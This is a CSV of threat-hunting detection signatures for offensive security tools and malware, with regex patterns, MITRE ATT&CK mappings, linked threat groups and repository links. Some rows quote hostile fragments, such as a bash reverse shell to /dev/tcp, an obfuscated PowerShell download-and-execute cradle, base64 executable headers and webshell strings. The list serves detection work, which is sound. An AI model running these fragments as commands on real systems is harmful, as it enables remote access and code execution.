"*# Majdi SaaD.vshost.exe*",".{0,1000}\#\sMajdi\sSaaD\.vshost\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","3898"
"*# Minimalistic AD login bruteforcer *",".{0,1000}\#\sMinimalistic\sAD\slogin\sbruteforcer\s.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3899"
"*# Minimalistic SMB login bruteforcer *",".{0,1000}\#\sMinimalistic\sSMB\slogin\sbruteforcer\s.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Credential Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3900"
"*# Minimalistic TCP and UDP port scanners*",".{0,1000}\#\sMinimalistic\sTCP\sand\sUDP\sport\sscanners.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3901"
"*# Perform the HTTP POST request to search emails*",".{0,1000}\#\sPerform\sthe\sHTTP\sPOST\srequest\sto\ssearch\semails.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3902"
"*# Pop up the calculator when you start excel.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3903"
"*# Pop up the calculator when you start powerpoint.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3904"
"*# Pop up the calculator when you start winword.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3905"
"*# README\n\nYour Files has been encrypted*",".{0,1000}\#\sREADME\\n\\nYour\sFiles\shas\sbeen\sencrypted.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3906"
"*# Smbtouch Scanner*",".{0,1000}\#\sSmbtouch\sScanner.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","3907"
"*# socksport = 9050*",".{0,1000}\#\ssocksport\s\=\s9050.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","3908"
"*# Sticky Keys backdoor exists*",".{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","3909"
"*# Using reflection to dump LSASS in-memory with stealth*",".{0,1000}\#\sUsing\sreflection\sto\sdump\sLSASS\sin\-memory\swith\sstealth.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","3910"
"*# Windows RCE Tool*",".{0,1000}\#\sWindows\sRCE\sTool.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3911"
"*#!/bin/bash\n/bin/bash -c 'sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}\#!\/bin\/bash\\n\/bin\/bash\s\-c\s\'sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","3912"
"*## DLHell Main function*",".{0,1000}\#\#\sDLHell\sMain\sfunction.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3913"
"*## Extracting Private Key from Active Directory Store*",".{0,1000}\#\#\sExtracting\sPrivate\sKey\sfrom\sActive\sDirectory\sStore.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","3914"
"*#1 - Smuggling binary via Service DisplayName*",".{0,1000}\#1\s\-\sSmuggling\sbinary\svia\sService\sDisplayName.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3915"
"*#2 - Smuggling binary via WMI*",".{0,1000}\#2\s\-\sSmuggling\sbinary\svia\sWMI.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3916"
"*#Author Yehia Elghaly*",".{0,1000}\#Author\sYehia\sElghaly.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","3917"
"*#Bind Shell (Client) (XOR Algorithm)*",".{0,1000}\#Bind\sShell\s\(Client\)\s\(XOR\sAlgorithm\).{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#content","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","3918"
"*#BOT#CloseServer*",".{0,1000}\#BOT\#CloseServer.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3919"
"*#BOT#OpenUrl*",".{0,1000}\#BOT\#OpenUrl.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3920"
"*#BOT#RunPrompt*",".{0,1000}\#BOT\#RunPrompt.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3921"
"*#BOT#SvrUninstall*",".{0,1000}\#BOT\#SvrUninstall.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3922"
"*#BOT#URLDownload*",".{0,1000}\#BOT\#URLDownload.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3923"
"*#BOT#URLUpdate*",".{0,1000}\#BOT\#URLUpdate.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3924"
"*#Code By Leeon123*",".{0,1000}\#Code\sBy\sLeeon123.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","3925"
"*#CODED BY SMUKX*",".{0,1000}\#CODED\sBY\sSMUKX.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3926"
"*#Dumps exported function from legit DLL using winedump*",".{0,1000}\#Dumps\sexported\sfunction\sfrom\slegit\sDLL\susing\swinedump.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3927"
"*#GetClipboardText*",".{0,1000}\#GetClipboardText.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also knownn as Darkcoment - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3928"
"*#god bless you, NSA's autorootkit*",".{0,1000}\#god\sbless\syou,\sNSA\'s\sautorootkit.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #content","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","3929"
"*#include ""DirtyVanity.h""*",".{0,1000}\#include\s\""DirtyVanity\.h\"".{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","3930"
"*#include ""RogueOxidResolver.h*",".{0,1000}\#include\s\""RogueOxidResolver\.h.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","3931"
"*#include ""ShoggothEngine.h""*",".{0,1000}\#include\s\""ShoggothEngine\.h\"".{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","3932"
"*#pip install pycryptodome  , It works only v3.11.5 Above.*",".{0,1000}\#pip\sinstall\spycryptodome\s\s,\sIt\sworks\sonly\sv3\.11\.5\sAbove\..{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","3933"
"*#Removes previous hijacked dll*",".{0,1000}\#Removes\sprevious\shijacked\sdll.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3934"
"*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*",".{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","3936"
"*${White}A tool to perform clipboard poisoning attack*",".{0,1000}\$\{White\}A\stool\sto\sperform\sclipboard\spoisoning\sattack.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","3937"
"*$2y$10$ACTF7jbtyof6YoTCqitwLOxQ9II8xitPKC4pNi6SQjZM3HXkKiCZ*",".{0,1000}\$2y\$10\$ACTF7jbtyof6YoTCqitwLOxQ9II8xitPKC4pNi6SQjZM3HXkKiCZ.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","3938"
"*$ADelegReport*",".{0,1000}\$ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3939"
"*$adPEAS_*",".{0,1000}\$adPEAS_.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#content","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","3940"
"*$AllCurrentPwdDiscovered*",".{0,1000}\$AllCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","3941"
"*$attacker_IPlist*",".{0,1000}\$attacker_IPlist.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3942"
"*$B64PwshCommand*",".{0,1000}\$B64PwshCommand.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","3943"
"*$backdoorcode*",".{0,1000}\$backdoorcode.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","3944"
"*$BaseTicket | Select-String -Pattern 'doI.*",".{0,1000}\$BaseTicket\s\|\sSelect\-String\s\-Pattern\s\'doI\..{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3946"
"*$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`e`x $c.downloadstring*",".{0,1000}\$c\.Proxy\.Credentials\=\[Net\.CredentialCache\]\:\:DefaultCredentials\;\`i\`e\`x\s\$c\.downloadstring.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","3947"
"*$C2_SERVER*",".{0,1000}\$C2_SERVER.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","3948"
"*$C2ExternalIP*",".{0,1000}\$C2ExternalIP.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3949"
"*$C2Output@$date.pdf*",".{0,1000}\$C2Output\@\$date\.pdf.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3950"
"*$calcwllx64 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*",".{0,1000}\$calcwllx64\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3951"
"*$calcwllx86 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*",".{0,1000}\$calcwllx86\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3952"
"*$CertutilDump*",".{0,1000}\$CertutilDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3953"
"*$DNSExfiltratorLib*",".{0,1000}\$DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","3954"
"*$DriverName = ""Totally Not Malicious""*",".{0,1000}\$DriverName\s\=\s\""Totally\sNot\sMalicious\"".{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#content","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","3955"
